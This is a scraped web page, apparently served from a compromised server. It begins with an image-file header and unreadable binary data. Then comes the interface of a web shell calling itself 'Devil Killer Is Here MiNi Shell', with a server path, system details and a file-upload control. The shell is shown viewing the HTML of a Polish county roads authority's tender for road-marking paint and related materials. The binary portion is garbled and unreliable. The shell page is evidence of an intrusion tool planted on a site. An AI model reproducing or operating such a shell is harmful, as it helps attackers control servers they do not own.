JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220428/0014004401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa materiałów do oznakowania poziomego dróg powiatowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W OTWOCKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 014848593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bohaterów Westerplatte 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Karczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdp@powiat-otwocki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.powiat-otwocki.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa materiałów do oznakowania poziomego dróg powiatowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8c787827-c727-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00140044</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdpotwock.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">2. Komunikacja między<br/>zamawiającym a wykonawcami odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej<br/>zgodnie z art. 61 ustawy, za pośrednictwem elektronicznej platformy zakupowej (dalej: „Platforma”)<br/>pod adresem: https://zdpotwock.eb2b.com.pl/ , która spełnia wymagania opisane w art. 64 ustawy. <br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na Platformie Zakupowej. Zarejestrowanie <br/>i utrzymywanie konta na Platformie Zakupowej oraz korzystanie z Platformy jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>korzystania z Platformy Zakupowej określa Regulamin<br/>Platformy Zakupowej (dostępny pod adresem internetowym https://platforma.eb2b.com.pl/user/terms<br/>lub https://xx.eb2b.com.pl/user/terms). Wykonawca przystępując do postępowania o udzielenie<br/>zamówienia publicznego tj. bezpłatnie rejestrując się lub logując (w przypadku posiadania konta w<br/>Platformie Zakupowej), akceptuje warunki korzystania z Platformy, określone w Regulaminie oraz<br/>uznaje go za wiążący</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest Zarząd Dróg Powiatowych w Otwocku z/s w<br/>Karczewie ul. Bohaterów Westerplatte 36, 05-480 Karczew tel. 22 780 64 21<br/>• inspektorem ochrony danych osobowych w Zarząd Dróg Powiatowych w Otwocku jest Pani Daria<br/>Bartnicka, email: iod@powiat-otwocki.pl ,<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego,<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843), dalej „ustawa Pzp”;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>• posiada Pani/Pan:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, z<br/>uprawnienia do sprostowania lub<br/>uzupełnienia o których mowa w art 16 rozporządzenia 2016/679 , nie może skutkować zmiana<br/>wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawi Skorzystanie<br/>Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia o których mowa w art 16 rozporządzenia 2016/679 , nie może skutkować zmiana<br/>wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP/P-06/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zakup i dostawa materiałów niezbędnych do wykonania oznakowania poziomego dróg powiatowych tj. <br/>a)	białej farby akrylowej (bez mikro kulek)<br/>b)	niebieskiej farby akrylowej<br/>c)	czerwonej farby akrylowej<br/>d)	rozpuszczalnika do farby drogowej,<br/>e)	mikro kulki<br/>f)	utwardzacza do masy chemoutwardzalnej<br/>g)	białej masy chemoutwardzalnej<br/>h)	czerwonej masy chemoutwardzalnej<br/><br/>2.	W ramach zamówienia podstawowego Dostawca zobowiązany jest do dostarczania:<br/>a)	białej farby akrylowej (bez mikro kulek) w ilości 2 000 kg<br/>b)	niebieskiej farby akrylowej w ilości 30 kg<br/>c)	rozpuszczalnika do farby drogowej w ilości 550 litrów<br/>d)	utwardzacza do masy chemoutwardzalnej w ilości 50 kg,<br/>e)	białej masy chemoutwardzalnej w ilości 5 000 kg<br/>f)	czerwonej masy chemoutwardzalnej w ilości 1 000 kg<br/><br/>3.	Zamawiający informuje, że korzysta z prawa opcji, przedmiot zamówienia może się zwiększyć maksymalnie o ilość: <br/>a)	białej farby akrylowej (bez mikro kulek) w ilości 1 000 kg<br/>b)	niebieskiej farby akrylowej w ilości 60 kg<br/>c)	czerwonej farby akrylowej w ilości 1 000 kg<br/>d)	rozpuszczalnika do farby drogowej w ilości 450 litrów<br/>e)	mikro kulki w ilości 500 kg<br/>f)	utwardzacza do masy chemoutwardzalnej w ilości 60 kg<br/>g)	białej masy chemoutwardzalnej w ilości 6 000 kg<br/>h)	czerwonej masy chemoutwardzalnej w ilości 1 000 kg<br/><br/>4.	Informację dotyczące zadania<br/>1)	Informację dotyczące farby akrylowej:<br/>a)	Farba akrylowa przeznaczona do cienkowarstwowego poziomego oznakowania dróg, parkingów i innych miejsc o nawierzchni bitumicznej, betonowej po których porusza się pojazd lub piesi. <br/>b)	Farba akrylowa musi nadawać się do nakładania ręcznego i mechanicznego wszystkimi typami malowanek.<br/>c)	Farba musi charakteryzować się wysoką przyczepnością do podłoża, odpornością na warunki atmosferyczne, ponadto musi być niepękająca, dobrze kryjąca, wysoce odporna na ścieranie, odporna na działanie wody i soli drogowej.<br/>d)	Farba musi być przeznaczona do wykonywania każdego oznakowania poziomego zgodnie z załącznikiem Nr 2 do Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2008 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach <br/>e) Farbę należy dostarczyć w oryginalnych szczelnie zamkniętych opakowaniach (wiadra stalowe) o wadze opakowania w przedziale od 20 kg do 40 kg <br/>f)	Farba powinna zachować swoje właściwości w oryginalnych opakowaniach nie narażonych na bezpośrednie działanie promieni słonecznych przez okres 12 miesięcy od daty produkcji. <br/>g)	Gęstość w 20 ºC: 1,55 – 1,65 g/cm3<br/>h)	Lepkość wg Krebsa: 72 – 92 KU<br/>i)	Zawartość substancji stałych: 70 – 80 (%)<br/>j)	musi spełniać normę PN-EN 1280:2011.<br/>2)	Informację dotyczące mikro kulek szklanych<br/>a)	Materiał w postaci kulek szklanych refleksyjnych do posypywania lub narzucania pod ciśnieniem na materiały oznakowania powinny zapewniać widoczność w nocy poprzez odbicie powrotne w kierunku pojazdu wiązki światła wysłanej prze reflektory pojazdu.<br/>b)	Musi spełniać standard EN 1423:2012 + AC:2013<br/>c)	Oferowane mikro kule muszą spełniać następujące wymagania:<br/>- maksymalna średnica kulek do fary drogowej akrylowej od 100 do 630 mikronów<br/>- maksymalna średnica kulek do masy chemoutwardzalnej od 400 do 850 mikronów<br/>- współczynnik załamania światła n (klasa A)≥ 1,5<br/>- zawartość kulek z defektami ≤ 20% <br/>3)	Informację dotyczące rozpuszczalnika<br/>a)	Rozpuszczalnik do farb drogowych na bazie toluenu przeznaczony do rozcieńczania farb drogowych przy temperaturach otoczenia poniżej 10 oC oraz do mycia urządzeń i narzędzi służących do aplikacji farb drogowych i mas chemoutwardzalnych <br/>4)	Informację dotyczące masy chemoutwardzalnej:<br/>a)	Masa chemoutwardzalna dwuskładnikowa<br/>b)	Zawartość spoiwa dla barwy białej od 20 do 24 % (m/m)<br/>c)	Zawartość spoiwa dla barwy czerwonej od 20 do 24 % (m/m)<br/>d)	Współczynnik luminacji β dla barwy białej ≥ 0,70<br/>e)	Współczynnik luminacji β dla barwy czerwonej ≥ 0,10<br/>f)	Wskaźnik szorstkości dla barwy białej i czerwonej ≥ 45<br/>g)	Gęstość dla bary białej od 1,850 g/cm3 do 1,950 g/cm3<br/>h)	Gęstość dla bary czerwonej od 1,800 g/cm3 do 1,900 g/cm3<br/>i)	Lepkość dla bary białej od 90 KU do 100 KU<br/>j)	Lepkość dla barwy czerwonej od 100 KU do 110 KU<br/>k)	musi spełniać normę PN-EN 1280:2011.<br/>5)	Informację do utwardzacza:<br/>a)	Kusi być komponentem B utwardzającym masę<br/>6)	Uruchomienie prawa opcji następuje poprzez złożenie oświadczenia woli w przedmiocie skorzystania z prawa opcji w określonym przez niego zakresie. Zamawiający oświadcza, iż z prawa opcji może skorzystać przez cały okres realizacji umowy. Zamawiający zastrzega sobie prawo skorzystania z prawa opcji wielokrotnie nie przekraczając sumarycznie ilości przewidzianej w prawie opcji.<br/>7) Realizacja prawa opcji nastąpi w terminie następnego dnia od dnia złożenia pisemnego zamówienia. <br/>8)	Przedmiot zamówienia przeznaczony zostanie do poziomego znakowania dróg ( przejść dla pieszych, linii segregacyjnych, strzałek i innych znaków poziomych ).<br/>9)	Zamówienia będą dokonywane sukcesywnie w miarę rzeczywistych potrzeb Zamawiającego.<br/>10)	Miejsce dostawy: siedziba zamawiającego ul. Bohaterów Westerplatte 36, 05-480 Karczew,<br/>11)	Odbiór dostawy w godzinach 700 – 1500.<br/>12)	Dostawy będą realizowane transportem Wykonawcy.<br/>13)	Zamówienia będą składane w formie pisemnej i przesyłane poprzez pocztę elektroniczną. <br/>14)	Podstawą przyjęcia dostawy będzie podpisany przez Zamawiającego dokument WZ wystawiony przez Dostawce.<br/>15)	Każda dostarczona partia towaru może zostać sprawdzona przez Zamawiającego pod kątem jakościowym jak i ilościowym.<br/>16) Produkt powinien posiadać aktualną, kompletną krajową ocenę techniczną oraz Atest Higieniczny PZH ważny na okres realizacji zamówienia. <br/>17)	Dostarczona farba oraz masa musi spełniać normę PN-EN 1280:2011. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44811000-8 - Farba drogowa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 3.	Zamawiający informuje, że korzysta z prawa opcji, przedmiot zamówienia może się zwiększyć maksymalnie o ilość: <br/>a)	białej farby akrylowej (bez mikro kulek) w ilości 1 000 kg<br/>b)	niebieskiej farby akrylowej w ilości 60 kg<br/>c)	czerwonej farby akrylowej w ilości 1 000 kg<br/>d)	rozpuszczalnika do farby drogowej w ilości 450 litrów<br/>e)	mikro kulki w ilości 500 kg<br/>f)	utwardzacza do masy chemoutwardzalnej w ilości 60 kg<br/>g)	białej masy chemoutwardzalnej w ilości 6 000 kg<br/>h)	czerwonej masy chemoutwardzalnej w ilości 1 000 kg <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji pojedyńczego zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu.<br/>2)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki dotyczące:<br/>a)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku w powyższym zakresie,<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie stawia warunku w powyższym zakresie,<br/>c)	sytuacji ekonomicznej i finansowej – Zamawiający nie stawia warunku w powyższym zakresie,<br/>d)	zdolności technicznej i zawodowej:<br/>Zamawiający uzna za spełniony, jeżeli wykaże, że:<br/>a)	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował jedną umowę na dostawę masy chemoutwardzalnej o wartości każdej umowy 70 000,00 zł brutto lub dostawę farby drogowej o wartości każdej umowy 80 000,00 zł brutto<br/>b)	posiada aktualną na okres realizacji zamówienia krajową ocenę techniczną dla farby drogowej oraz masy chemoutwardzalnej <br/>c)	oferowane produkty posiadają pozytywną ocenę Narodowy Instytut Zdrowia Publicznego – Państwowy Zakład Higieny w odniesieniu do farby drogowej oraz masy chemoutwardzalne <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy w zakresie art. 108 ust .1 pkt 1, 3, 4, 5 podstaw wykluczenia z postępowania oraz art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę służących ochronie bezpieczeństwa narodowego</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykaz dostaw wykonanych w okresie ostatnich trzech lat przed upływem terminu składania oferta jeżeli okres działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotu, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencję bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż trzy miesiące przed upływem terminu składania ofert albo wniosku o dopuszczenie do udziału w postepowaniu – załącznik do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania do złożenia Krajowej Oceny Technicznej oraz Atestu PZH <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania do złożenia Krajowej Oceny Technicznej oraz Atestu PZH <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 